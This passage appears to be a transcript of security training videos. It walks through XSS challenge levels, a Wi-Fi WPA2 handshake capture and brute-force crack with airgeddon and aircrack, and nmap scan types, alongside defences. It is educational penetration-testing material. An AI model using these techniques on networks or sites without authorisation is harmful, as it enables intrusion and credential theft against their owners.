executes differently. In order to get a better understanding of how XSS DOM attack is being performed, let us analyze the following example. If there is a website called texting.com, we know default is a parameter. Therefore, in order to perform XSS DOM attack, we should send a script as parameters. A DOM-based XSS attack may be successfully executed even when the server does not embed any malicious code into the web page by using a flaw in the JavaScript executed in the browser. For example, if the client-side JavaScript modifies the DOM tree of the web page, it can be based on an input field or the get parameter without validating the input. This allows the malicious code to be executed. The malicious code that exploits flaws in the browser on the user side, and the script and the attack is not necessarily visible on the server side or to the app owner. By now, it is clear that cross-site scripting attacks are difficult to detect and even tougher to fight against. There are, however, plenty of ways one can safeguard against such attacks. Let's go through some of these preventive measures. Like mentioned earlier, XSS attacks are sometimes difficult to detect. However, this can be changed if you get some external help. A way to prevent XSS attacks is using automated testing tools like Crash Test Security Suite or Akinetic Security Suite. Still, manual testing is highly time consuming and costly, and therefore not possible to be done for every iteration of your web application. Consequently, your code shouldn't be untested before any release. Using automated security, you can scan your web application for cross-site scripting and other critical vulnerabilities before every release. This way, you can ensure that your web application's live version is still secured whenever you alter or add a feature. Input fields are the most common point of entry for XSS attack scripts. Therefore, you should always screen and validate any information input into data fields. This is particularly important if the data will be included as HTML output. This can be used to protect against reflected XSS attacks. Validation should occur on both the client side and server side as an added precaution. This helps validating the data before it's being sent to the servers and can also protect against persistent XSS scripts. This can be accomplished using JavaScript. XSS attacks only appear if any user input is being displayed on the web page. Therefore, try to avoid displaying any untrusted user input if possible. If you need to display user data, restrict the places where the user input might appear. Any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than the input that appears inside a division or a span element inside the HTML body. Protecting against XSS vulnerabilities typically requires properly escaping user-provided data that is placed on the page. Rather than trying to determine if the data is user-provided and could be compromised, we should always play it safe and escape data whether it is user-provided or not. Unfortunately, because there are many different rules for escaping, you still must choose the proper type of escaping before settling on a final code. Encoding should be applied directly before user-controllable data is written to a page because the context you are writing into determines what kind of encoding you need to use. For example, values inside a JavaScript string require a different type of escaping to those in an HTML context. Sometimes you'll need to apply multiple layers of encoding in the correct order. For example, to safely embed user input inside an event handler, you need to deal with both JavaScript context and the HTML context. So you need to first Unicode escape the input and then HTML encode it. Content Security Policy, or CSP, is a computer security standard introduced to prevent cross-site scripting, clickjacking, and other code injection attacks resulting from the execution of malicious content in the trusted web page context. It is a candidate recommendations of the W3C working group on web application security. It's widely supported by modern web browsers and provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on their website. HTTP only is an additional flag included in a set cookie HTTP response header. Using the HTTP only flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie, that is if the browser supports it. If the HTTP only flag is included in the HTTP response header, the cookie cannot be accessed through a client-side script. Again, this is if the browser supports this flag. As a result, even if a cross-site scripting flaw exists and a user accidentally accesses a link that exploits this flaw, the browser will not reveal the cookie to a third party. If a browser does not support HTTP only and a website attempts to set an HTTP only cookie, the HTTP only flag will be ignored by the browser, thus creating a traditional script accessible cookie. As a result, the cookie becomes vulnerable to theft of modification by any malicious script. Next on our docket is a live demonstration where we solve a set of cross-site scripting problems starting from the basic level to the topmost level 6. We're going to start at level 1. In this web application, it demonstrates the common cause of cross-site scripting where user input is directly included in the page without proper escaping. If we interact with a vulnerable application window here and find a way to make it execute JavaScript of our choosing, we can take actions inside the vulnerable window or directly edit its URL bar. This task needs only basic knowledge. Let's see why the most primitive injections work here right away. Let's do a simple query and inspect the resulting HTML page. I'm going to use this phrase with a single quote as a special character. We can now inspect the HTML page. We can see here in this line, the special character single quote appears in the result over here. The provided query text is placed directly in a B tag, as in a body element. We need to perform a reflected XSS into the web application because they are non-persistent XSS attacks, and the payload should be included in the URL to perform successful exploitation. We can use any payload, but we're going to use the simple one to perform an alert in this web application. It's simple and can be shown easily. We're just going to write the script over here. And we're going to press search. As you can see, we have successfully launched our first cross-site scripting attack. We can see an alert box pop up with the necessary message, and a similar process can be used to steal browser cookies and passwords, albeit with different commands. Now we have the option to move to level 2. In this web application, it shows that how easily XSS bugs can be introduced in complex chat applications. Chat app conversations are stored in a database and retrieved when a user wants to see the conversation. Therefore, if a malicious user injects some JavaScript code, all visitors will be infected. This kind of cross-site scripting attack is more powerful, and it is more riskier than reflected cross-site scripting attacks, and that's why it is known as stored XSS. I posted my query with a special character of a single quote, and this is what I get. Whatever I typed in simply appeared on the page right after I click on Share Status. Let's see the source. You can see here, the text I posted seems directly put inside a block code tag. So even a simple script tag we used in level 1 should work here, but it will not. Let us examine the code to understand why. We're going to toggle the code over here and check the index.html file. Important part is line 32. The generated HTML fragment, which is the HTML variable in the code, is added to the mail HTML using the inner HTML method. So when the browser parsing this HTML fragment, it will not execute any script tag defined within that HTML fragment. HTML parser will not execute a script tag when it parses HTMLs via this method. This is why the script tag like we used in level 1 is not going to work here. Our solution is to use events. Events will execute the defined JavaScripts. We're going to use an image over here. And when we press on Share Status, in the above injection, we are loading an image that doesn't exist, which causes to trigger an onError event. In onError event, it will execute our alert method. With that, we are able to beat level 2, and we can now move up to the next level in our challenge. As you can see, clicking on any tab causes the tab number to be displayed in the URL fragment. This hints that the value after the hashtag controls the behavior of the page. That is, it is an input variable. To confirm, let's analyze the code. As you can see in line 43, inside the event handling, the value provided after the hash in the URL is directly passed onto the choTab method. No input validation is being performed. The value passed to the choseTab method is directly injected into the img tag in line 17. This is an unsafe assignment and it is the vulnerable part of the code. Now all we have to do now is to craft a payload that would adjust the img tag to execute our JavaScript. Remember, the script tag from level 1 would not work here since the variable HTML is used to add the DOM dynamically. Hence the events are aces here once again. I will choose to use the existing img tag and change the source to something that doesn't exist, hence forcing it to fall in to execute an on error, even which I will pass the URL. Once we visit that URL, we can see that our Java pop-up has opened up here with the same message of XSS level 3 has been completed. With this, we can now move on to level 4, which is going to present a different kind of attack. In this web application, there is a timer on the page. That means whatever numbers we put in the box, a countdown starts. And then when it finishes, the application alerts that the countdown is finished. And we can see the time is up pop-up appearing over here, and this resets the timer again. Now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL. Let us examine the code to see how the timer parameter is being handled. We're going to visit timer.html over here. And we're going to check over here. In line 21, the start timer method is being called in the onload event. However, the timer parameter is being directly passed to the start timer method. We need to perform a pop-up alert in the web application which escapes the content of the function start timer without breaking the JavaScript code. The parameter value is directly added to the start timer method without any filtering. What we can try to do here is to inject an alert function to be executed inside the onload event along with the start timer method. We're going to remove this argument and put our script over here. Now when we press on create timer, and we have a pop-up with the XSS level 4 completed. We can now move on to level 5. In this web application, this application XSS is different because this challenge description says cross-site scripting isn't just about correctly escaping data. Sometimes attackers can do bad things even without injecting new elements into the DOM. It's kind of open redirect because the attack payload is executed as a result of modifying the DOM environment in the victim's browser. This environment is used by the original client-side script so that the client-side code runs in an unexpected manner. The vulnerability can be easily detected if the next link in the sign-up page is inspected. The href attribute value of next link is confirmed, which is exactly the value of the next URL query parameter, as you can see over here. This means using the next query parameter can be used to inject a JavaScript code to the href attribute of the next link. The following is the best way to do it. As soon as the user clicks on the link, the script will be triggered. We're going to press anything random. And now that we click next, we can see the XSS level 5 that we had provided in the URL as a parameter to the next variable. Since the value of next provided appears on a pop-up, we can consider the attack a success and move on to the final level 6. In this web application, it shows some of the external JavaScript is retrieved. If you analyze the URL, you can see that the script is loaded already. The vulnerability lies within how the code handles the value after the hashtag. If you check on line 45, the value right after the hashtag is taken as the gadget name, and then in line 48, the value is directly passed on to the includeGadget method. And in the includeGadget method that we can see over here, you can see in line 18, a script tag is created and the URL gadget name parameter value is directly used as the source attribute of the script tag in line 28. This means we can completely control the source attribute of the script tag that is being created. That is, with this vulnerability, we can inject our own JavaScript file into the code. We can inject a URL of our own hosted JavaScript into the web application's URL after the hashtag, and the URL should not be using HTTPS but anything like that to bypass the regular expression for security checking. We're going to remove the pre-stored URL and we're going to load our own JavaScript file. Finally, we have reached the end of our challenge. We completed 6 different varieties of cross-scripting attacks and used different solutions for all of the 6 questions. Cybersecurity has become one of the most rigid industries in the last decade, while simultaneously being the most challenged. With every aspect of corporate culture going online and embracing cloud computing, there is a plethora of critical data circulating through the internet, all worth billions of dollars to the right person. Increasing benefits require more complex attacks, and one of these attacks is a brute force attack. A brute force, or known as brute force cracking, is the cyber attack equivalent of trying every key on your keyring and eventually finding the right one. Brute force attacks are simple and reliable. There is no prior knowledge needed about the victim to start an attack. Most of the systems falling prey to brute force attacks are actually well secured. Attackers let a computer do the work, that is trying different combinations of usernames and passwords until they find the one that works. Due to this repeated trial and error format, the strength of password matters a great deal. Although with enough time and resources, brute force will break a system since they run multiple combinations until they find the right passcode. Hey everyone, this is Vaibhav from Simplilearn and welcome to this video on what is a brute force attack. Let's take a look at the topics we need to cover today. We start by learning about what a brute force attack is and its reliability as a hacking technique. Next, we take a look at a step-by-step approach to how the hackers can take control of a system using brute force techniques. Moving on, we learn about the harmful effects of getting our personal devices brute forced or compromised and how it can affect not only our devices but our friends and family as well. We also understand a few steps that we can enforce to make a better security system against brute force attacks specifically, And finally, we have a demonstration that explains how the brute force mechanism works in a real-world situation. But before we begin, make sure you're subscribed to our Simplilearn channel and click the bell icon to never miss an update from us. Let's begin with learning about brute force attacks in detail. A brute force attack, also known as an exhaustive search, is a cryptographic hack that relies on guessing possible combinations of targeted password until the current password is discovered. It can be used to break into online accounts, encrypted documents, or even network peripheral devices. The longer the password, the more combinations that will need to be tested. A brute force attack can be time-consuming and difficult to perform if methods such as data obfuscation are used, and at times downright impossible. However, if the password is weak, it could merely take seconds with hardly any effort. Dictionary attacks are an alternative to brute force attacks, where the attacker already has a list of usernames and passwords that need to be tested against the target. It doesn't need to create any other combinations on its own. Dictionary attacks are much more reliable than brute force in a real-world context, but the usefulness depends entirely on the strength of passwords being used by the general population. There is a three-step process when it comes to brute forcing a system. Let's learn about each of them in detail. In step 1, we have to settle on a tool that we are going to use for brute forcing. There are some popular names on the market like Hashcat, Hydra, and John the Ripper. While each of them has its own strengths and weaknesses, each of them perform well with the right configuration. All of these tools come pre-installed with certain Linux distributions that cater to penetration testers and cybersecurity analysts like Kali Linux and Parrot Security. After deciding what tool to use, we can start generating combinations of alphanumeric variables whose only limitation is the number of characters. For example, while using Hydra, a single 6-digit password will create 900,000 passwords with only digits involved. Add alphabets and symbols to that sample space and that number grows exponentially. The popular tools allow customizing this process. Let's say the hacker is aware of the password being a specific 8-digit word containing only letters and symbols. This will substantially increase the chances of being able to guess the right password since we remove the time taken to generate the longer ones. We omit the need for including digits in such combinations. These small tweaks go a long way in organizing an efficient brute force attack, since running all the combinations with no filters will dramatically reduce the odds of finding the right credentials in time. In the final step, we run these combinations against the file or service that is being broken. We can try and break into a specific encrypted document, a social media account, or even devices at home that connect to the internet. Let's say there is a Wi-Fi router. The generated passwords are then fed into the connection one after the other. It is a long and arduous process, but the work is left to the computer rather than someone manually clicking and checking each of these passcodes. Any password that doesn't unlock the router is discarded and the brute force tool simply moves on to the next one. This keeps going on until we find the right combination which unlocks the router. Sometimes reaching the success stage takes days and weeks, which makes it cumbersome for people with low computing power at their disposal. However, the ability to crack any system in the world purely due to bad password habits is very appealing, and the general public tends to stick with simple and easy to use passwords. Now that we have a fair idea about how brute force works, let's see if we can answer this question. We learned about how complex passwords are tougher to crack by brute force. Among the ones listed on the screens, which one do you believe will take the longest to be broken when using brute force tools? Leave your answers in the comment section and we will get back to you with the correct option next week. Let's move on to the harmful effects of getting a system compromised due to brute force attacks. A hacked laptop or mobile can have social media accounts logged in, giving the hackers free access to the victim's connections. It has been reported on multiple occasions where compromised Facebook accounts are sending malicious links and attachments to people on their friends list. One of the significant reasons for hacking, malware infusion is best done when spread from multiple devices, similar to distributing spam. This reduces the chance of circling back the source to a single device which belongs to the hacker. Once brute forced, a system can spread malware via email attachments, sharing links, file upload via FTP, etc. Personal information such as credit card data, usage habits, private images and videos are all stored in our systems, be it in plain format or root folders. A compromised laptop means easy access to these information that can be further used to impersonate the victim regarding bank verification, among other things. Once a system is hacked, it can also be used as a mail server that distributes spam across lists of victims. Since the hacked machines all have different IP addresses and MAC addresses, it becomes challenging to trace the spam back to the original hacker. With so many harmful implications arising from a brute force attack, it's imperative that the general public must be protected against such. Let's learn about some of the ways we can prevent ourselves from becoming a victim of brute force attacks. Using passwords consisting of alphabets, letters, and numbers have a much higher chance of withstanding brute force attacks thanks to the sheer number of combinations they can produce. The longer the password, the less likely it is that a hacker will devote the time and resources to brute force them. Having alphanumeric passwords also allows the user to keep different passwords for different websites. This is to ensure that if a single account or a password is compromised due to a breach or a hack, the rest of the accounts are isolated from the incident. Two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed. This OTP can be obtained either via email, SMS, or specific 2FA applications like Authy and Aegis. Email and SMS-based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked. Applications that are specifically made for 2FA codes are much more reliable and secure. CAPTCHAs are used to stop bots from running through web pages precisely to prevent brute forcing through their website. Since brute force tools are automated, forcing the hacker to solve CAPTCHA for every iteration of a password manually is very challenging. The CAPTCHA system can filter out these automated bots that keep refreshing the page with different credentials, thereby reducing the chances of brute force considerably. A definite rule that locks the account being hacked for 30 minutes after a specific number of attempts is a good way to prevent brute force attempts. Many websites lock account for 30 minutes after 3 failed password attempts to secure the account against any such attack. On an additional note, some websites also send an email instructing the user that there have been 3 insecure attempts to log into the website. Let's look at a demonstration of how brute force attacks work in a real-world situation. The world has gone wireless. With Wi-Fi taking the reins in every household, it's natural that their security will always be up for debate. To further test the security index and understand brute force attacks, we will attempt to break into the password of a Wi-Fi router. For that to happen, we first need to capture a handshake file, which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop. The operating system used for this process is Parrot Security, a Linux distribution that is catered to penetration testers. All the tools being used in this demo can easily be found pre-installed in this operating system. To start our demo, we're going to use a tool called AirGeddon, which is made to hack into wireless networks specifically. At this point, it's going to check for all the necessary scripts that are installed in the system. To crack into a Wi-Fi and to capture the handshake file, we're going to need an external network card. The significance of the external network card is a managed mode and a monitor mode. For now, the WLX1 named card is my external network adapter, which I'm going to select. To be able to capture data over the air, we're going to need to put it in monitor mode. As you can see above, it's written it is in managed mode right now. So we're going to select option 2, which is to put the interface in monitor mode. And its name is now WLAN 0 monitor. The monitor mode is necessary to capture data over the air. That is the necessary reason why we need an external card, since a lot of inbuilt cards that come with the laptops and the systems, they cannot have a monitor mode installed. Once we select the mode, we can go into the fifth, which is the handshake tools menu. In the first step, we have to explore for targets, and it is written that monitor mode is necessary to select a target. So let's explore for targets and press enter. We have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality. For example, this ESS ID is supposed to be the Wi-Fi name that we see when connecting to a network. Geo24, Recover Me, these are all the names that we see on our mobile when trying to search for the Wi-Fis. This BSS ID is supposed to be an identifier, somewhat like a MAC address that identifies this network from other devices. The channels features on one or two, there are many channels that the networks can focus on. This here is supposed to be a client that is connected to one such network. For example, the station that you can see 5626, this is supposed to be the MAC address of the device that is connected to a router. This BSS ID is supposed to be which Wi-Fi it is connected to. For example, 5895D8 is this one, which is the Geo24 router. So we already know which router has a device connected to it, and we can use our attack to capture this handshake. Now that it has already run for 1 minute, now that we press Ctrl C, we will be asked to select a target. See, it has already selected the number 5, which is the Geo24 router, as the one with clients. So it is easy to run an attack on, and it is easy to capture a handshake for. We select network 5 and we run a capture handshake. It says we have a valid WPA WPA2 network target selected and that the script can continue. Now, to capture the handshake, we have a couple of attacks, a DAuth or a DAuth air replay attack. What this attack does is kick the clients out of the network. In return, when they try to reconnect to the Wi-Fi, as they are configured that way, that when a client is disconnected, it tries to reconnect it immediately, it tries to capture a handshake file, which in turn contains the security key, which is necessary to initiate the handshake. For our demo, let's go with the second option, that is the DAuth air replay attack. Select a timeout value, let's say we give it 60 seconds, and we start the script. We can see it capturing data from the Geo24 network, and here we go. We have the WPA handshake file. Once the handshake file is captured, you can actually close this, and here we go. Congratulations. In order to capturing a handshake, it has verified that a PMK ID from the target network has successfully been captured. This is the file that is already stored. It's a .cap file. For the path, we can, let's say we can keep it in a desktop. Okay, we give the path and the handshake file is generated. We can already see a target over here, same Geo24 router with the BSS ID. Now if we return to its main menu, we already have the handshake file captured with us. Now our job is to brute force into that handshake capture file. The capture file is often encrypted with the security key of the Wi-Fi network. If we know how to decrypt it, we will automatically get the security key. So let's go to the offline WPA WPA2 decrypt menu. Since we'll be cracking personal networks, we can go with option 1. Now to run the brute force tool, we have two options. Either we can go with the air crack or we can go with the hashcat. Let's go with aircrack plus crunch, which is a brute force attack against a handshake file. We can go with option 2. It can already detect the capture file that we have generated, so we select yes. The BSS ID is the one which denotes the Geo24 router, so we're going to select yes as well. The minimum length of the key, for example, it has already checked that the minimum length of a Wi-Fi security key, which is a WPA to PSK key, will always be more than 8 digits and below 64 digits. So we have to select something in between this range. So if we already know, let's say that the password is at least 10 digits, we can go with the minimum length as 10. And as a rough guess, let's say we put the maximum length as 20. The character set that we're going to use for checking the password will affect the time taken to brute force. For example, if we already know that, or we have seen a user use a password while connecting to the router as something that has only numbers and symbols, then we can choose accordingly. Let's say if we go with only uppercase characters and numeric characters, go with option 7, and it's going to start decrypting. So how AirCrack is working right here, you can see this passphrase over here. The first 5 or 6 digits are A. It starts working its way from the end, from the last character. It keeps trying every single combination. You can see the fourth character from the right side, the D. It will eventually turn to E because it keeps checking up every single character from the end. This will keep going on until all the single characters are tested and every single combination is tried out. Since the handshake file is encrypted using the security key, that is the WPA2 key of the router, whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router. This is the way we can brute force into Wi-Fi routers anywhere in the world. With ethical hacking and penetration testing becoming mainstream in corporate environments, trained personnel and relevant equipment are in high demand. The right software framework can be the tipping point in a hacking campaign which deals with intricate hardware. One such tool that has become a mainstay for decades is NMAP. When it comes to scanning machines for open ports and services, NMAP has always been the first choice for hackers. Being lightweight and open source, NMAP has strong community backing and receives regular updates. Let's take a look at the topics to be covered today. We start by learning about the different phases in ethical hacking and where NMAP is most valuable to ethical hackers. We learn the basics of NMAP and its purpose during a penetration testing campaign. Next, we take a look at the top-level approach of NMAP as a scanning tool and how it conducts these scans on host machines. Moving on, we cover the multiple modes and types of scans that can be performed using NMAP on unsuspecting users. We also look at some alternatives that users can prefer if NMAP is not something they are comfortable with, while a live demonstration of the powers of NMAP will help in shedding light on the topics being taught today. Let us first understand where and why NMAP is essential. There are essentially 5 phases in ethical hacking. The reconnaissance phase is the first phase of the penetration test. Here, the security researcher collects information about the target. It can be done actively or passively or both. It helps security firms gather information about the target system, network components, active machines, etc. This activity can be performed by using the information publicly available and by using different tools. The scanning phase is more tool-oriented rather than being performed manually. The tester runs one or more scanner tools to gather more information about the target. By using various scanners such as war dialers, port scanners, network mappers, and vulnerability scanners, the penetration tester collects as many vulnerabilities which help in turn to attack a target in a more sophisticated manner. In the gaining access phase, the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous phase. The exploitation may be a buffer overflow attack, denial of service attack, session hijacking, and many more. Basically, the penetration tester extracts information and sensitive data from the servers by gaining access with different tools. In the maintaining access phase, the penetration tester tries to create a backdoor for himself. It helps him to identify hidden vulnerabilities in the system while allowing him to come back to the system to retrieve more data further on. In the clearing tracks phase, the tester tries to remove all logs and footprints which might help the administrator identify his presence. This helps the tester to think like a hacker and perform corrective actions to mitigate those activities. NMAP is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system. It is necessary to know this before running the necessary exploits, thus allowing the hackers to leverage any insecure openings and breach the device. So the reconnaissance and the scanning phase are the points where NMAP finds the most use. Let us now understand what NMAP is from a layman's perspective. NMAP, which stands for Network Mapper, is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host and service uptime. The program is most commonly used via a command line interface and is available for many different operating systems such as Linux, FreeBSD, and Gentoo. It is most beneficial in the early stages of ethical hacking, where a hacker must figure the possible entry point to a system before running the necessary exploits. NMAP was developed for enterprise-scale networks and can scan through thousands of connected devices. However, in recent years, NMAP is being increasingly used by smaller companies as well. NMAP uses raw IP packets in novel ways to determine what hosts are available on the network, what services these hosts are offering, what operating systems they are running, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. The rise of the IoT, in particular, now means that networks used by these companies have become more complex and therefore harder to secure. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms that leads to a thorough breach of the system. The recent emergence of IoT botnets like Mirai has also stimulated interest in NMAP, not least because of its ability to interrogate devices connected via the UPnP protocol, but also to highlight any devices that may be malicious. Now that we understand what NMAP is, let us take a look at the workflow of how an ethical hacker uses this tool in penetration testing. At a practical level, NMAP is used to provide detailed, real-time information on your networks and on the devices connected to them. We have the hacker running NMAP on a system, with the victim machine running a standard installation of the operating system, be it Windows, Mac OS, or Linux. The NMAP interface will send specially crafted packets to generate some reply from the victim machine. The victim machine in return will send some information back to the NMAP host, with replying some of the services and hosts that are being run on the computers. NMAP allows the network admins to find which devices are running, discover some open ports and other services. This in turn helps discover the vulnerabilities and the possible entry points for hackers to breach into. We are now aware of how NMAP works on a basic level, but there are many varieties of scans that users can run on local machines. Let's take a look at some of them. The ping sweep is a simple type of NMAP scan where it pings to all the available IP addresses to check which IPs respond to ICMP protocol. If the users need to know only the number of IP addresses and not many details, the ping sweep is very useful. It's fast and hence the results to be known are fetched very easily. The SYN scan is the most useful type of NMAP scan, which does work very quietly. It sends an SYN packet via the TCP protocol or the transfer control protocol to all the intended ports. If an acknowledgement pack is received to the system, it is sure that a port is opened there. No response means that the port is either closed or not available. Here the acknowledgement pack is not sent back to the system, assuming that the connection is not valid. The scan is not shown in most of the scan logs, and hence it is safe to use SYN scan to identify the open ports. The TCP Connect scan is similar to SYN scan in many aspects, as it uses the TCP layer to send packets and is passed to all the ports. Here, the difference is that the full connection is done by sending the acknowledgement packets back. The logs can easily find the TCP scan and need more power from the machines to do the work, but it is more accurate. If all the accesses related to the OS are available to the user, it is better to do a TCP scan than an SYN scan, as all the low-level and high-level accesses are required for the scan. The network is also loaded more, and hence users must be careful about overloading the system and the networks. The idle scan is really used to check whether any malicious attacks are planned on any particular network. Users need not control the external host, but an IP address and a port should be given to the same. All of the requirements are taken from the scanner itself. The RPC scans or remote procedure calls are done by hackers to make the system vulnerable to virus attacks. It is thus necessary to know whether our systems answer such calls and make our system open to malware. RPC scan is done to check this by finding the ports open with certain commands being run by RPC. The Windows scan is a simple scan where the application scans the acknowledgement packets received from the ports once the SYN packets are sent. If there are any abnormalities in the ACK packets received, the scan reports the same and helps in recognizing which ports are functioning in a different manner. The bounce scan is used to check the security in the file transfer protocol layer. FTP layers mostly do not accept any packets, and once it is rejected from the FTP layers, there are chances that it might be sent to an internal layer so that it can access the internal machines. Bounce scan checks this loophole by doing exactly the same process and identifies whether our FTP layer is open to vulnerability or not. The FIN scan is similar to SYN scan, where the system that sends the packets receives the response back, and it will mostly be a TCP FIN packet. If the system sends an RST packet, it is a false alarm and users need not be worried about the same. The null scan is useful for other systems than Windows, where the systems can easily identify what kind of packets they have received and respond back with either TCP packets or null responses. Null scans are not useful for Windows as they may not always produce the desired results. When it comes to looking at alternatives, there is a wide range of free network monitoring utilities as well as free open source vulnerability scanners available to network administrators and security auditors. What makes NMAP stand out as the tool IT and network security managers need to know is its flexibility and power. There are some alternatives to NMAP, but most of them are focused on providing specific niche functionality that the average system administrator does need frequently. Mass scan, for instance, is much faster than NMAP but provides less detail. In reality, however, NMAP provides all the functionality and speed that the average user requires, especially when used along with other similar tools like Netcat, which can be used to manage and control network traffic, and ZenMap, which provides a graphical user interface for NMAP. But as an all-rounder solution to network scanning, nobody can go wrong with NMAP as their tool of choice. Let's now take a tour of NMAP based on all the things we have covered today. In this live demonstration, we start by learning of how to install NMAP on a fresh operating system that doesn't come pre-installed with the tool. We also cover the different types of scans that can be run on local machines, along with checking multiple inferences an ethical hacker can gather based on the scan output of an NMAP screen. Finally, we run scans on vulnerable machines to get an idea of how to proceed with the outputs we gather using this tool. The first step in our demonstration is installing NMAP. Now, it depends heavily on what Linux distribution you're going to use to perform ethical hacking. Right now, I'm using Parrot Security operating system. If you're not aware of what Parrot Security is or even what Kali Linux is, we highly suggest that you check out the videos of those two operating systems on our YouTube channel so that you can get a fair idea of what they serve. Now, if you are using any of these two operating systems, NMAP should come pre-installed by default. To check if NMAP is pre-installed or not, you can just press on Applications over here. Go to the Pen Testing section. Go to this Information Gathering tab. And you should be able to see NMAP right here. Now, let's say you do not have NMAP pre-installed. Maybe you're using a Linux distribution like Ubuntu or Linux Mint or something that is based on Debian operating systems. One thing you have to make sure that NMAP should be in the distribution repository. Once you check that, or even if you do not know if it is present, you can just this command. It should be sudo, which is to give root permissions for installation, apt. apt is the package manager of all Linux distributions that are based on Debian. That goes for Debian Stable, Ubuntu, Linux Mint, Kali Linux, Parrot Security, and anything of that nature. apt is the package manager which handles the installation and removal of applications in these specific operating systems. Once you're here, just write install and nmap. Press enter and it's going to ask you for the root password that you set when you install the operating system in the first place. Enter your root password and press enter again. As you can see, it's saying that nmap is already installed the newest version since I'm running Parrot Security operating system. Now, should you be running this operating system or even Kali Linux, you should receive a similar message and the installation is already done. If you are using some other distribution, let's say even Black Arch Linux or Manjaro, anything like that, the installation steps will be slightly different. This sudo apt install nmap command is for distributions that are derived from Debian and Ubuntu. If you want to install in Arch Linux based distributions, you have to use their package manager, which is known as PAMAC. But that is for a different step. And if you want to get ethical hacking, the best way to start is by learning either Kali Linux or Parrot Security. Now that the installation is done, we're going to learn how to use NMAP. One of the most basic functions of NMAP is to identify active hosts on the network. We can do this by using a ping scan. The ping scan identifies all of the IP addresses that are currently online without sending any packets to these hosts. Now to run the ping scan, we're going to write nmap. The flag we're going to mention over here is SP. Now these flags are the different traits of the nmap scan. Depending on what flag we use, we can send different kinds of requests to the host that we are scanning. Now, before moving forward with this, let me open another terminal over here and check the IP address. We're going to write the command ifconfig and find the subnet in which this system is present. As you can see, the IP address is 192.168.72.131. Now this operating system is being run on a virtual machine software known as VMware. The VMware in itself is running on a Windows 10 operating system. Considering they are now a part of the local network, this IP address is of Parrot Security, and the Windows operating system, which is the host system in my scenario, will fall in this particular subnet. So to run our scan, we're going to target 192.168.72.1/24. This command then returns a list of hosts on your network and the total number of assigned IP addresses. This is going to be capital P. Yeah. If you spot any hosts or IP addresses on that list that you cannot account for, you can then run further commands to investigate them further. As of right now, you can see the machine that is the Parrot Security. This IP address can be detected in the subnet. The 192.168.72.1 is my local Windows machine that is running VMware software and ultimately this virtual machine. The 72.2 is the DHCP server that hosts the internet connection of the Parrot Security. This we can ignore for now. Now, the Windows machine that we have over here, let's run some tests on that. We're going to clear our terminal and we can close this actually. When scanning hosts, nmap commands can use server names, IPv4 addresses, or IPv6 addresses. A basic nmap command will produce information about the given host. To run a basic port scan, we can just use nmap along with the IP. Now, as we remember, the IP is 192.168.72.1. This is the IP of my local Windows 10 machine. As you can see, it shows the ports that are open and the particular servers that these ports are running. Now, we can also have a detection of the operating system. Now, mind you, this is not 100% correct, and the reliability depends on the installation and what kind of fingerprinting measures are available. Now, since this does TCP/IP fingerprinting, it needs some extra permissions. The flag that we are going to use is nmap -o along with the same IP address. Like I said, since this does TCP/IP fingerprinting, it requires root privileges. Now, to provide root privileges, we're just going to add the nmap and sudo keyword. Going to repeat the same command that we wrote above. As you can see, it has successfully detected that I am running Microsoft Windows 10 with this MAC address. It has also shown the correct build number of the Windows 10 system that I am using. This is useful for troubleshooting, scanning for few vulnerabilities, or even locating some services that need to be updated. Now, to get the necessary information about these services, for example, what versions they are using, we have a command known as SV, which stands for service version. We use the same IP address and press enter. Now, as you can see, the scan is complete, and if you can check the results of the scan above here, we don't see any version number for the services. Here, we can actually check what version they are running. Now, this becomes helpful when we are trying to find specific versions to exploit. For example, if VMware Workstation 16.1.2 had some particular vulnerability, we can exploit it by checking this command. Apart from the host scanning, port scanning is one of the most basic utilities. There are a few ways that this command can be customized as well. For example, I have already checked that the 443 command is open, but I have found out after running this lengthy scan. Let's say I only want to check if the port 443 is open. NMAP. I'm going to use the flag of -p, which stands for port, and give 443 as an argument here, using the same IP address. And you can see it says it's open, but we already knew it is open. Let's say there was something else. If let's say we're going to scan if the Apache web server port is open, which usually runs on 80. Obviously, since I'm not running an Apache web server, it says it's closed. Now we can combine these two commands by running both ports simultaneously. To do that, we can just put a comma and complete the rest similarly. As expected, 80 is closed and 443 is open. Another feature of NMAP for port scanning is showing of ranges. Now, ranges can be beneficial when you're trying to see up to a certain limit. For example, NMAP -p, we're going to check what ports are open between 100 to, let's say, 2000. This acts as a range. Everything else is the same. And it checks all ports in the range of 100 to 2000. Whatever ports is open in between that range, it can be mentioned over here. We're going to clear the screen now. Another flag that can be used with NMAP is the SS command. This runs a stealth scan, which is a little harder to detect if you're the IT admin of the system that is being scanned. The results will more or less be the same, although this will need elevated root privileges. 2.1. As you can see, this is more or less similar to a port scan. It just adds an extra MAC address as well for good measure. But like I said, it's more about the stealth. The normal scans usually are easier to detect when the logs are being checked. Stealth scans are relatively tougher to check. On much more intricate systems, this takes longer as well. Now that we're done with port scanning, let's look at a vulnerable machine. The system that you're scanning right now is my own personal system, with everything is pretty locked down as much as it can be. There is an attack box running in the cloud, the IP address of which is over here. Now, to be able to get into this network, we need to connect to their personal network using a VPN. So what I'm going to do is switch to a different workspace over here. I'm going to open a terminal, and if you can see over here, there is a hacktest.ovpn file. I'm going to connect to their VPN network using this OVPN file. And once we get the initialization sequence completed message, we know that the connection has been established. Like we discussed, this is the vulnerable device IP. We're going to copy this and we're going to try to ping this. Let's open a new terminal. We're going to try to ping this and check if we are able to reach this machine. And as you can see, we're getting a reply back, which means we are now part of the local network where the vulnerable machine is present. Let's run a service scan map with the respective versions. We ran the similar scan on my local machine, where we were able to detect what version each service was running. What we're going to do over here is by checking what kind of services are open on the machine running on the 